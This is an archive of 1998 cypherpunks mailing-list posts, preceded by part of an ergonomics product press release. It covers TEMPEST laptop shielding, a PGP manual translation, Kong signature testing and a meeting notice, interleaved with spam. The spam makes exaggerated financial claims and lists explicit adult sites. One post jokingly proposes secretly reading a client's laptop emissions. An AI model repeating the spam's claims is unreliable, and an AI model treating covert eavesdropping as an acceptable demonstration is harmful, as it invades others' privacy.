In Work Injury Prevention and Ergonomics: Michael S. Melnik, M.S., O.T.R., owner and president of Minneapolis-based Prevention Plus, Inc., has authored and co-authored several works on Cumulative Trauma Disorder (CTD), back injury and other current ergonomic related issues. He has consulted for firms such as Fluor Daniel, Pepsi-Cola, Wal-Mart and United Airlines, to name a just a few. Mr. Melnik is an Occupational Therapist with an advanced degree in exercise physiology from the University of Illinois. His area of expertise includes Employee Education/Training, Ergonomics Programs, Job Site Stretching and Warm-Up Programs. 

``Mr. Melnik's practical approach to injury prevention fits extremely well with our company philosophy. He is well respected in the industry and a very charismatic speaker which is sure to have the industry buzzing about our product,'' commented Cleveland. ``His knowledge and expertise will bring a pragmatic focus to the products' applications for all types of work environments for all types of companies.'' 

``I am excited at the Private Practice(TM) product and the possibilities it holds to compliment what has been my passion for the last 10 years; inviting positive changes in behavior,'' stated Mr. Melnik. ``At Prevention Plus, we are always looking for more ways to improve the work environment and to promote safety and awareness on the job. I truly believe the Private Practice(TM) system is a cutting edge solution that makes a great deal of sense for most companies today. I am confident that many will add this simple product to their existing injury prevention and ergonomic programs and that it will give growing companies the ''jump start`` they need to finally begin a program they can afford.'' 

Based in Laguna Hills, CA, Innovative Tracking Solutions innovates, designs, and develops sophisticated, yet simple products that have broad ranges of applications. The rapid growth of the company's Healthcare Products Division is a result of aggressive R&D and marketing, solid relationships with companies within the healthcare infrastructure, and a consistent focus on pioneering extensions to current healthcare services with a multitude of product applications. 

For more information regarding IVTX or the Private Practice(TM) Vibration Reminder Disk, call 1-888-4REMEMBER (473-6362) or visit the company's website: http://www.innovativetx.com or hyperlink http://www.privatepractice.com. 

SOURCE: Innovative Tracking Solutions Corp.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bjohnson@deskmail.com
Date: Sat, 31 Oct 1998 17:18:20 -0800 (PST)
To: <flash@toad.com>
Subject: ACCEPT CREDIT CARDS! WATCH SALES SOAR!
Message-ID: <199811010118.RAA15479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Accept Credit Cards - Any Business - Guaranteed Approval  - NO 
Application Fee!

WATCH YOUR SALES SOAR!!

                           1-800-675-6573   8:30am - 6:00pm 
Central, live agents
                                (1-800-466-9222 ext. 8151  24hr 
information)
                                                    

-- Low rates, great prices, FREE Check by Phone/Fax set-up with 
account

-- Be processing in 5 business days. ABSOLUTELY NO HASSLES!

-- Use PC or Mac Software, or an easy to use terminal

-- SELLING ON THE WEB? Process "Real-Time" fully secured 
transactions
    for all major credit cards. Accept checks on-line as well.   

-- Use your business or personal checking account, NO site 
inspection.

-- MLM, Home-based, Internet, Adult, Mail-Order and Retail, our 
specialties.

-- We'll Pay You $100 for each merchant account referral you 
provide us.  Know   
    others who need this service? Got a downline or newsletter? 
Selling a Biz-op?

                               "If You Don't Call Us We Both Lose 
Money"

 
                     1-800-675-6573  8:30am - 6:00pm Central, 
live agents
                            (1-800-466-9222 ext.8151 24hr 
information)


NOTE: 
For those on the internet who do not want to recieve exciting 
messages such as this.....

*We strive to comply with all state and federal laws and to send 
ads only to interested parties.

*This ad is not intended for nor do we knowingly send to 
Washington State residents. 

* OR CLICK_HERE_TO_GOTO_REMOVE-LIST.COM   
(http://remove-list.com)
Remove-List is a free public service offering to help the general 
public
get removed from commercial mailings lists and has not sent this 
message.
If you want their help please add your name to their list and we 
you will
not receive a commercial email from us or any other member bulk 
emailer.

* Responding to the "return address" will NOT have your name 
removed. 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED SAT OCT 31 <stuffed@stuffed.net>
Date: Sat, 31 Oct 1998 02:14:43 -0800 (PST)
To: (OVER 100 FREE PICS DAILY!)
Subject: 100S OF FREE PICS'N'LINKS EVERY DAY!
Message-ID: <19981031081000.639.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 SUPERB, HI-RES, HOT PHOTOS
+ 5 SUPER SEXY STORIES
+ CYBER AFFAIRS SEX NETWORK
+ HI TECH PORN
+ XXX 4 FREE
+ LESBIAN PALACE
+ 123 PORNO
+ XXX FEMALES
+ FORBIDDEN PLEASURES
+ WET CUMSHOTS & WILD HARDCORE
+ KANDY'S LAND
+ WILD WORLD OF SEX
+ BONUS PIC 1 -> http://www.stuffed.net/home/2941.htm
+ BONUS PIC 2 -> http://www.stuffed.net/home/249.htm
+ BONUS PIC 3 -> http://www.stuffed.net/home/19240.htm
+ BONUS PIC 4 -> http://www.stuffed.net/home/17350.htm
+ BONUS PIC 5 -> http://www.stuffed.net/home/24968.htm
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

If you haven't visited STUFFED in the last few days,  you're
in for a real treat.  It's faster than  ever before and now,
as a subscriber,  you get 35 FREE new pics  every day,  plus
over 100 more at carefully selected FREE sites we link to.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 7 Oct 1998 17:05:19 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: SF Bay Cypherpunks Mtg, Sat 10 Oct, Stanford
Message-ID: <v04101f06b2416d0f4da2@[206.169.229.43]>
MIME-Version: 1.0
Content-Type: text/plain


Online version: <http://www.freedomfighter.net/cypherpunks/physical.html>

October 1998  Physical Meeting

General Info:

  Sat 10 Oct
  1:00 - 5:00 PM
  Stanford University Campus (Palo Alto, California)
    - Tressider Union courtyard

   The October Physical Meeting of the San Francisco Bay Area Cypherpunks
   will be held on Saturday 10 October 1998 from 1-5 PM. This is an "Open
   Meeting on US Soil" and, as always, members of the Public are encouraged
   to attend.

Meeting Agenda:

 1:00-2:00
   Informal pre-meeting gathering

 2:00-5:00
   Agenda TBD on-the-fly at the meeting... Some suggestions:
   
   CIPHR'99 conference announcement
   MacCrypto'98 summary
   Yet Another Snake-Oil cluster-jerk. This month: "JAWS"
   "Software as Speech" discussion
   Review of Bruce Schneier's Review of TriStrata/TESS
   Cypherpunks/GNU/GPL License discussion
   PGP Keysigning session:
    - Bring a printout of your key's fingerprint/keyid/size + photoID
    - Load your key info into your Pilot or Newton for IR beaming

 5:00-?
   Dinner at a nearby restaurant usually follows the meeting.

Featured Speakers:

   (TBD)

Meeting Notes for Oct '98:

   The meeting will be shorter this month, because some cypherpunks were not
   ready to present, technical white-papers were not quite written (Nov) or
   the marketing weasels at a company-that-shall-remain-nameless were too 
   scared to show up. ;)
  
   MacCrypto'98 is being held this week nearby at Apple in Cupertino:
   several out-of-town cypherpunks are lurking. Therefore, it's extremely
   likely that agenda items will arise in realtime, so
   "you must be present to win."
  
   Because of the loose agenda, the meeting will begin slightly later than
   normal: 1:00 pm pre-meeting (instead of noon), 2:00 pm for the meeting.
  
   This is probably our last outdoor meeting for 1998.
  
   Unless I'm mistaken, this is our seven-year anniversary meeting(?).
  
Location Info:
  
   The meeting location will be familiar to those who've been to our outdoor
   meetings before, but for those who haven't been, it's on the Stanford 
   University campus, at the tables outside Tresidder Union, at the end of
   Santa Theresa, just west of Dinkelspiel Auditorium.
   We meet at the tables on the west side of the building, inside the 
   horseshoe "U" formed by Tresidder. Ask anyone on campus where Tressider
   is and they'll help you find it.
  
   Food and beverages are available at the cafe inside Tressider.

Location Maps:

   Stanford Campus (overview, Tresidder highlighted).
    http://www.stanford.edu/home/map/search_map.html?keyword=&ACADEMIC=Tresidder+Union
   Tresidder Union (zoomed detail view).
    http://www.stanford.edu/home/map/stanford_zoom_map.html?234,312
   Printable Stanford Map (407k).
    http://www.stanford.edu/home/visitors/campus_map.pdf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony@starsnstripes.com
Date: Sat, 10 Oct 1998 17:15:01 -0700 (PDT)
To: you@starsnstripes.com
Subject: Dental / Optical Plan 2 bucks a week
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


                   The Dental-Optical Plan
                                      .
           We work with a group of your local doctors
     and dentists and are offering a Dental - Optical Plan
     that runs approximately $2 a week for an individual
    and $3 a week for the entire family with no limit to the
                          number of children!
                                      .
  Would you like our office to furnish you with the details?
                                      .
 Our doctors are grouped by AREA CODE and ZIP CODE
     The company currently only responds to requests by
                             TELEPHONE.

For Details call Toll Free 1-800-447-1996  
Please Refer to ID Code 900



This message complies with the proposed United States Federal requirements 
for commercial email plus Washington State Commercial Email Bill. for information 
see: http://www.senate.gov/~murkowski/commercialemail/ EMailAmend Text.html  

To be removed   mailto:remove@unlimitd.com?subject=remove



Sean Davis
790 W.40 Hwy ste.336
Blue Springs MO 64015
1-800-447-1996






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 95959742@mailcity.com
Date: Sat, 17 Oct 1998 00:50:06 -0700 (PDT)
To: Friend@public.com
Subject: Accept Credit Cards Online!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


INCREASE SALES UP TO 100%
ACCEPT CREDIT CARDS OVER THE INTERNET *** NO SETUP FEES

Good Credit / Bad Credit/ No Credit **** NO PROBLEM****!!!
It Just Doesn't Matter - Everyone Gets Approved 
ONLY $49.95 TO GET STARTED!!!
No Upfront Fees For Application-Processing
While Others Charge You From $195 TO $250 To Get Set Up
WE CHARGE ZERO FOR SETUP FEES!!  
Limited Offer So Take Advantage Of It!!
We Specialize In Servicing The Following:
*Multilevel Marketing
*Mail Order/Phone Sales
*At Home Business
*INTERNET BASED BUSINESS
*New Business*Small Business
Whatever!!! We Do It All!!! Everyone Is Welcome!

Call us toll free today 1-800-600-0343 ext. 2310

What Can We Do For Your Company????

>>>>>INTERNET SERVICE<<<<<

It's finally here!!! 
A fast and reliable way to process credit cards through your web site.
The Internet's reach is global - it knows no time zones or physical
boundaries. With our user friendly, easy to use program, you will convert
your web site from an electronic brochure to a virtual storefront without
the addition of a sales clerk!!!!!

SECURE REAL-TIME ON-LINE TRANSACTIONS make it as easy as possible for your
customers to purchase your products or services.  
We use SSL SECURITY (best on the NET today).

Now tell me if this doesn't sound intriguing, lets say a customer visits
your web site and decides they want to buy your product(s) or service(s). 
They would simply enter their credit card information and receive an
approval WITHIN 5 SECONDS.  That's all there is to it!!!  

>From that point on, the sale is complete and the money will be directly
deposited into your business checking account within 24 to 48 hours. 
So you will have LIQUID ASSETS AVAILABLE ALMOST IMMEDIATELY!!!!   
Your customer will be e-mailed a receipt and you will be e-mailed an
invoice slip, all instantaneously.  Now, since this program is automated
for 24 hours a day 7 days a week, you will be receiving orders and making
money in your sleep!!!!!
IT'S JUST THAT EASY!!!!

WHAT MAKES US SO SPECIAL?????

* We process over $4 Billion in credit card transactions every year. 
* We have over 100,000 merchants online and growing.
* We offer secured on-line real time transactions.
* We offer 24 hour customer service 7 days a week in 17 different languages.
* We offer complete training and installation through our technical support group.
* We offer a life time warranty and unlimited upgrades.
* We help make money for your company and your customers.

>>>>>CONTACT INFORMATION<<<<<

Just place a toll free phone call to 1-800-600-0343 ext.2310 .  
 
Once you call, an account executive will contact you within 24 hours to discuss 
your options, answer your questions, and start you on your way to financial success.
 
DON'T DELAY!!!! ACT TODAY!!!
____________________________________________________________________________________
To be Removed send and email to merchant89@mailcity.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 1 Nov 1998 21:14:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops
In-Reply-To: <199810312353.SAA23037@camel7.mindspring.com>
Message-ID: <199811011247.HAA19869@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The rationale of the FOIA to NSA for TEMPEST docs is that
due to increased public awareness of that technology,
the manufacturers of classified TEMPEST products and 
services are chomping at the bit to sell them to a broader
public market -- as with other dual-use technology like
crypto.

We were asked to make the FOIA by those who've gotten
what they can from the many sources listed at Joel McNamara's
TEMPEST site -- which show that the market is growing but
is still hampered by classified restrictions:

   http://www.eskimo.com/~joelm/tempest.htm

Yes, it's improbably that NSA will release all the docs requested
but perhaps some will be shaken loose, again as with other
once classified technology like crypto. In part because of
rising public awareness, in part because of manufacturers'
desire, in part because NSA will have developed more 
advanced technology.

Tim has heretofore advised on TEMPEST measures and the
latest are useful, and correspond to what's available in the
commercial market and what is available in mil/gov pubs --
many listed at Joel's site.

We are working on our desktop model with a manufacturer
who supplies RF-protected glass for government and industry
rooms as well as for entire buildings. We figure that if we can
make a workable model, we'll be able to use to demonstrate
to our clients why TEMPEST protection is needed and how it
can be accomplished in an elegant design manner, paralleling
demonstrations used by the glass manufacturer to substantiate
claims for his products.

One of the many things that keeps techies from getting the public's
money is being unable to convince the buyer that the invention
is truly desirable. Thus comes the marketer, who has skills of
invention of another sort to charm the skeptical consumer that
this baby has got to be a part of his/her life -- like fancy homes,
medical care, insurance cars, clothing, foods, weapons, bibles, 
and, above all, national security.

So a mongerer's brew is needed to peddle these inessentials,
composed of seriousness, humor, terror, lies and pretended
guilelessness, the practices of anyone doing well or doing badly, 

indeed, humans going about whatever they do to fill up the void.

BTW, the best technology is nearly always going to be classified, 
with sky high prices paid for by gullible citizens to calm their 
manufactured terrors (the religion model, once churches and temples
now weapons and satellites; once the priest/architect hustle, now
that of the the NatSec wonk/scientist), so the commercial market is 
only going to offer less than the best, the declassified waste products, 
while selling it as "The Best."

So we're seeking the crumbs from the NatSec table. And will use
what we get or don't get in our marketing campaign, having learned
the immortally favorite scheme: a mix of fact, fiction and fixation
on getting people to trust the seller, not the always waste promise.

But Tim knows that, practices that like a master, makes bundles.
And I always take him seriously, believe everything he says, and
admire his deadpan sense of humor more than anything else. Been
threatened by him, too, if I don't, all in accord with the NatSec madness
of our era.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Emilio Oriente <oriente@capway.com>
Date: Sun, 1 Nov 1998 21:05:58 +0800
To: s.simpson@mia.co.uk
Subject: info PGP from France
Message-ID: <Version.32.19981101131054.00eed100@mail.capway.com>
MIME-Version: 1.0
Content-Type: text/plain



The PGP 6.0 Manual is available in french
-----------------------------------------


The User's Guide of the cryptographic application PGP 6.0 (Windows version)
has been translated in french by some users from the newgroup
fr.misc.cryptologie.

The document is in Acrobat PDF format and can be downloaded freely at these
URL :


http://www.geocities.com/SiliconValley/Bay/9648/intimite.htm

and soon mirrored on:


http://www.fortunecity.com/skyscraper/oracle/598/intimite.htm

PGP 6.0 freeware has been published in USA in the early september by
Network Associates, Inc. In spite of the US regulations prohibiting the
export of strong cryptography softwares, unknowns have exported PGP 6.0 in
Europe by email. The french is at this time the single language in which
the PGP 6.0 manual has been translated.

In the eyes of the french laws, the use of PGP 6.0 is prohibited on the
extent of the french territory. But his holding in France and his
importation from a country member of the European Union are perfectly legal.

(IMPORTANT : the text of this Manual stays the property of Network
Associates Inc. (NAI). NAI has not given his agreement for this
translation, which is provided by his authors only temporaly, waiting for
an official french version by NAI)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 2 Nov 1998 02:28:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops
In-Reply-To: <v03130315b2618c270619@[209.66.100.110]>
Message-ID: <v03130317b2624a87e7a4@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:38 AM -0800 11/1/98, John Young wrote:

>Tim has heretofore advised on TEMPEST measures and the
>latest are useful, and correspond to what's available in the
>commercial market and what is available in mil/gov pubs --
>many listed at Joel's site.
>

Understand that my comments are just some "common sense with a little bit
of physics" estimates, not direct knowledge of how best to shield laptops.

I worked inside a Faraday cage for several months--a cube about 12 feet on
a side made up of two layers of fine copper mesh separated by about 2
inches. We used ordinary radios to check the seal. We entered the room with
the radio on, closed the copper-gasketed door and then checked the AM and
FM bands with the volume cranked up. If all was well, we didn't even get
"static," just the characteristic internal/thermal/Johnson noise of the
radio circuitry.

(We were looking for signals from a Josephson junction in SQUID
(superconducting quantum-interferometric device) that were very, very weak
compared to ambient radio noise levels. We used a Princeton Applied
Research 124 lock-in amplifier and a boxcar amplifier. I surmise that the
effective shielding was very good. This was in 1972-3.)

Later, at Intel, a lab right next to mine had a Faraday cage around it.

Anyway, were I to try to shield a laptop I'd start with microwave leakage
meters, a couple of t.v.s and radio (of different types and bands), and
then I'd start recording signal levels of various sorts as different
shielding layers and types were applied to the laptop(s). Simple lab stuff.

I'd do this in preference to worrying about what some 1978 government docs
had to say about the subject. TEMPEST the specs are probably a mixture of
"RF shielding" tips and standards, and a mix of Van Eck radiation tuner
designs.

>We are working on our desktop model with a manufacturer
>who supplies RF-protected glass for government and industry
>rooms as well as for entire buildings. We figure that if we can
>make a workable model, we'll be able to use to demonstrate
>to our clients why TEMPEST protection is needed and how it
>can be accomplished in an elegant design manner, paralleling
>demonstrations used by the glass manufacturer to substantiate
>claims for his products.

Suggestion: Read the client's laptop when he's visiting. Then show him your
stuff.

(This means you've built a working Van Eck decoder, which may be too much
to expect, per the above about concentrating on blocking the RF.)



>
>One of the many things that keeps techies from getting the public's
>money is being unable to convince the buyer that the invention
>is truly desirable. Thus comes the marketer, who has skills of
>invention of another sort to charm the skeptical consumer that
>this baby has got to be a part of his/her life -- like fancy homes,
>medical care, insurance cars, clothing, foods, weapons, bibles,
>and, above all, national security.

Look, let me put this bluntly:

VERY FEW PEOPLE CARE ABOUT SECURITY.

Most businessmen are not even using PGP. Why will any of them pay a lot of
extra money for something that makes their laptops look like gargoyles or
pieces of shit?

(This is for the travelling businessmen threat model. The corporate network
threat model is even more problematic, as it means the corporation needs to
TEMPEST-protect some large fraction of their desktop machines, with any
unprotected machines being the weak links. I don't understand which threat
model you're concentrating on, though.)

And your next paragraphs tell me you have even less chance of sellling your
product to corporate America:

>So a mongerer's brew is needed to peddle these inessentials,
>composed of seriousness, humor, terror, lies and pretended
>guilelessness, the practices of anyone doing well or doing badly,
>
>indeed, humans going about whatever they do to fill up the void.


>BTW, the best technology is nearly always going to be classified,
>with sky high prices paid for by gullible citizens to calm their
>manufactured terrors (the religion model, once churches and temples
>now weapons and satellites; once the priest/architect hustle, now
>that of the the NatSec wonk/scientist), so the commercial market is
>only going to offer less than the best, the declassified waste products,
>while selling it as "The Best."


??????

Is this a diagnosed medical condition, like Tourette's? You start out
communicating reasonably clearly, then, as usual, trail off into this
gobbledegook.

Pynchon's Syndrome?


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Susan <sales@megasites.jp-inc.com>
Date: Mon, 2 Nov 1998 02:27:19 +0800
To: <cypherpunks@Algebra.COM>
Subject: Mega Business Website $12.95  Free Setup - Resellers Wanted Advertisement
Message-ID: <419.436100.41581713 sales@megasites.jp-inc.com>
MIME-Version: 1.0
Content-Type: text/plain



This message complies with the proposed United States federal requirements for 
commercial email bill section 301. If the message has reached you in error please 
pardon us and hit reply with remove in subject line. Thank you for your time.
-------------------------------------------------------------------------------------------------------------------------

You can now have your own 50MB web site (www.yourname,com) for just $12.95 
per month ! Our limited time offer includes Free setup + 50MB space + Unlimited 
email accounts + Unlimted hits + 100% FrontPage98 compatibility + Unix/N T 
Server/Netscape + Many other features !!
Free tranfer of your existing domain + Excellent Reseller plans
Why pay more...we give you the fastest servers (1074MB/SEC)
All the features that your business wants...for just $12.95 per month.

Visit our site at   http://www.megasites.jp-inc.com
Email us at sales@megasites.jp-inc.com

RESELLERS WANTED - We do all the work....You make money !!!

MegaSites
240 Union Ave Suite 5
Campbell CA 95008 USA
(408) 378-9996




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 2 Nov 1998 10:39:27 +0800
To: cypherpunks@Algebra.COM
Subject: Re: TEMPEST laptops
In-Reply-To: <v03130317b2624a87e7a4@[209.66.100.110]>
Message-ID: <v03130318b2627b816c00@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:26 PM -0800 11/1/98, Dave Emery wrote:
>On Sun, Nov 01, 1998 at 09:53:37AM -0800, Tim May wrote:
>>
>> Anyway, were I to try to shield a laptop I'd start with microwave leakage
>> meters, a couple of t.v.s and radio (of different types and bands), and
>> then I'd start recording signal levels of various sorts as different
>> shielding layers and types were applied to the laptop(s). Simple lab stuff.
>>
>
>	As someone who has actually spent hellish weeks working to
>suppress the RF emissions of some commericial network gear I designed -
>to make it pass FCC B and VDE certification - let me say this is a black
>art and no fun.  There are sophisticated electromagnetics programs that
>can sometimes succeed in modeling the radiation from a computer system,
>but they are very expensive and inputting all the required information
>is painful or downright impossible (data just not available or in a
>usable format), so this nasty job usually gets done seat of the pants
>style using rules of thumb and educated guesses and hard won experiance
>and lots of trial and error.  The job consists of attaching lossy
>ferrite beads, copper tape and other RF and common mode current supressing
>devices, shielding plastic packages with spray metallic coatings, adding
...

All good points, but there's a big difference between trying to meet FCC
emissions requirements for a commercial product that has to meet cost,
weight, and cosmetic requirements (e.g., a plastic case!), and the scenario
of making a TEMPEST-like box for a laptop. Ferrite beads and copper tape
are a lot different from a sealed box made of 10-gauge copper sheet.

>	Nobody does this using ordinary radios and TVs, the standard
>tool is a broadband spectrum analyzer or special EMC receiver with
>quasipeak filters and special calibrated wideband dipole antennas that
>have known gain and pattern characteristics.  Isolating of radiating
>sites is often done with near field probes or sniffers attached to the
>spectrum analyzer that allow hot spots to be tracked to within a few cm.
>Often in order to get enough sensitivity one also needs special
>preamps, and a RF quiet site where signals from the DUT aren't drowned
>out by pagers and cellphones and emissions from nearby computers.   A
>good bit of this work is done way out in the country under non-metallic
>fiberglass buildings that don't create reflections that confuse the
>measurements.   And conducted as opposed to radiated noise is measured
>with special power line filters and cable filters...

Sure, but my point was that John Young should *at least* start with actual
measurements, as opposed to putting most of the onus on a FOIA request to
get TEMPEST docs declassified.

If he can get spectrum analyzers and all that stuff, so much the better.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 2 Nov 1998 06:57:53 +0800
To: cypherpunks@cyberpass.net
Subject: Kong Re: Using a password as a private key.
In-Reply-To: <199810291821.TAA03804@replay.com>
Message-ID: <3.0.5.32.19981101134444.008adae0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



		(James - bug report below.)
At 07:21 PM 10/29/98 +0100, Anonymous wrote:
>What happens if you create another key which signs an existing message,
>as was illustrated here recently in the case of Toto's key.  Can you
>convince Kong that you are the same person who sent the earlier message?

No, you can't.  I've got some sample Kong documents below.
(Be sure to get the US version of Kong from http://catalog.com/jamesd/kong/
rather than the somewhat older version from replay (which you get
if you tell James's page you're not a US/Canadian citizen.
Some UnAmerican should hack their way through James's protection
and update replay's version.))

If you check the signature on a document identical to one
you've already got stored, it'll tell you about it, and list
all the usernames that have signed that document.

When you try to store a second key with the same name as an existing key,
it'll tell you that they're different, and let you add a note to the new one.
(Unfortunately, it doesn't also let you add a note to the first one;
a nice feature change would be to always ask for notation when
receiving a new key.)  

(It's a bit hard to test on one machine, since you tend to step
over yourself in the process, but it should work fine in a clean environment,
and Kong is very tolerant of having its Kong.mdb file blown away
and doesn't even mind some editing using MS Access, though YMMV.)


Signed by one key calling itself t3 - note the +Q in the first line
    --
It's a fnord!  Run for your life!
    --digsig
         t3
     +Q+XF9EiiOOGFa6rYr5QtU2My14/KyO01DHLikYDVv
     Fy1GfdEmmV07XfX9R3HEOc/BA+ajNa8/MRqDBhE1
     4eLHEngilBC2g81hloGGQFmOYd35vQEHKGtBcb4F9

Signed by a different key calling itself t3 - note the H9 in the first line
    --
It's a different fnord!
    --digsig
         t3
     H9/V3rBrv7Ha3g0Z1/ywvbHimgezshgcTzSYJxbS4z
     nCRf3S7brCpkLPzUD+dSFcErPNB+SdrF0q46TZnH
     4YHfVOu6q+51iKrRc3ru63qk1wWCR2uR3wCALQRjs

Same document as before, signed by the H9 t3
    --
It's a fnord!  Run for your life!
    --digsig
         t3
     H9/V3rBrv7Ha3g0Z1/ywvbHimgezshgcTzSYJxbS4z
     z662iY5op2nMkXrI7nP4A5ehgvaoB5+q5daHbHgl
     4NmZf3tZdVcZObpUmovyAeDBMZr1W9t5lDICMJc8b


Kong lets you sign a document in different modes -
in one mode, the document can't be modified after signing,
and in other modes you can change whitespace or linebreaks,
making it more tolerant of different email environments.

    --
This message didn't have any line breaks, 
and it's in Text mode.
    --digsig
         t3
     H9/V3rBrv7Ha3g0Z1/ywvbHimgezshgcTzSYJxbS4z
     aAGTQyJ92R6XeoH7ZTepQ0f79xKddgm+bsIfLckn
     4+WLznhaXWAf7fX0yay4Ajq6Bg+AGQo0T8r8aWbJ2

    --
This message didn't have any line breaks,  
and it's in Strict mode, 
so this should fail.
    --digsig
         t3
     H9/V3rBrv7Ha3g0Z1/ywvbHimgezshgcTzSYJxbS4z
     /6YbckVZQdSNbu4DSbrIjXRmu2wU8IiiXP3LnyUn
     2I/gQ5Uq5+42xQYfLxCbDM+YwowNgkBFXlfPvfIYK

By the way, you don't want to hit the "view" button
after checking this one - you'll get 
Run-Time Error 3021 - No current Record
and then Kong dies.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 2 Nov 1998 06:57:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: TEMPEST laptops
In-Reply-To: <199810312353.SAA23037@camel7.mindspring.com>
Message-ID: <3.0.5.32.19981101142536.008aee30@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:19 PM 10/31/98 -0800, Tim May wrote:
>At 3:44 PM -0800 10/31/98, John Young wrote:
> > Not to beat an NDA horse but while we're waiting for NSA to
> > process our FOIA request for TEMPEST docs, are there
> > products available to shield a desktop box, or better, a laptop?
>I haven't been following this FOIA request for TEMPEST docs. It seems
>pointless, for several reasons:
>1. No doubt a lot of stuff will be classified, and FOIA can't break
>classification, generally.

Yup.   Most of it's SECRET COMSEC or CONFIDENTIAL COMSEC.
The parts I'm aware of cover making equipment not radiate,
blocking radiation that does occur, and making sure signals
don't leak between the red and black sides.  There's presumably
much more secret documentation at NSA about how to spy on stuff,
and there's no way you'll get any of that.

>2. The physics is what's important, not TEMPEST specs on specific pieces
>of equipment the government may be using, etc.

That too.  TEMPEST, like other security problems,
depends a lot on your threat models - you need a lot quieter equipment
if there's an NSA Antenna Van parked in your driveway
than if you're out in an empty field with nobody around for miles.
What the equipment specs tell you is what the military thinks
is adequate protection for typical threat environments,
such as defense contractor office buildings or low-tech battlefields.

The last time I checked, which was 8-10 years ago,
there was a lot of TEMPEST-certified equipment on the market,
though many of the vendors would only sell to the government
and businesses working on TEMPEST-requiring government contracts.

The main things on the market back then were
- Room/building enclosure technology, so you could put lots of
regular computer equipment in a big shielded room.
This includes heavy-duty filtering of power supplies;
our equipment was quite happy with it's nice clean power feeds.
- Shielded minicomputers - basically stuck in rack-sized versions
of room enclosures, with fiber-optic comm lines or shielded cables.
- Quiet PCs, which generally had heavier metal cases, shielded cables,
rather heavy keyboards, and lots of shielding in the monitors.
They tended to cost about $5000 more than the equivalent non-TEMPEST PC.

I don't know how the market is today, but it's probably a LOT more work
to quiet and/or shield a 400MHz Pentium2 than a 4.77Mhz 8086 -
higher frequency signals have shorter wavelengths, so they can
leak through smaller holes, and the newer Pentiums probably put out a
lot more energy above 3GHz than 8086s did, which means that
centimeter-long cracks can leak signals.

At the time, the rule of thumb for room shielding was that you
wanted 100dB attenuation; the actual specs were
more complex than that, and presumably classified.
We did our routine measurements using a 450MHz transmitter, 
which would let us find any leaks that evolved from wear&tear
on our doors or wiring mistakes on our comm or power gear
(like forgetting to screw some lid on tight enough),
but the TEMPEST contractors did the official complex measurements.
This was a significant change from Vietnam-era shielding,
which was typically copper mesh that provided 60dB attenuation

Just using a regular laptop isn't enough; I've seen laptops
transmit recognizable images to a television (though I was probably
using AC power rather than batteries, and may or may not have had
the display mode set to LCD-and-monitor.)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Mon, 2 Nov 1998 05:14:26 +0800
To: Tim May <tcmay@got.net>
Subject: Re: TEMPEST laptops
In-Reply-To: <v03130315b2618c270619@[209.66.100.110]>
Message-ID: <19981101152627.C29091@die.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Nov 01, 1998 at 09:53:37AM -0800, Tim May wrote:
> 
> Anyway, were I to try to shield a laptop I'd start with microwave leakage
> meters, a couple of t.v.s and radio (of different types and bands), and
> then I'd start recording signal levels of various sorts as different
> shielding layers and types were applied to the laptop(s). Simple lab stuff.
> 

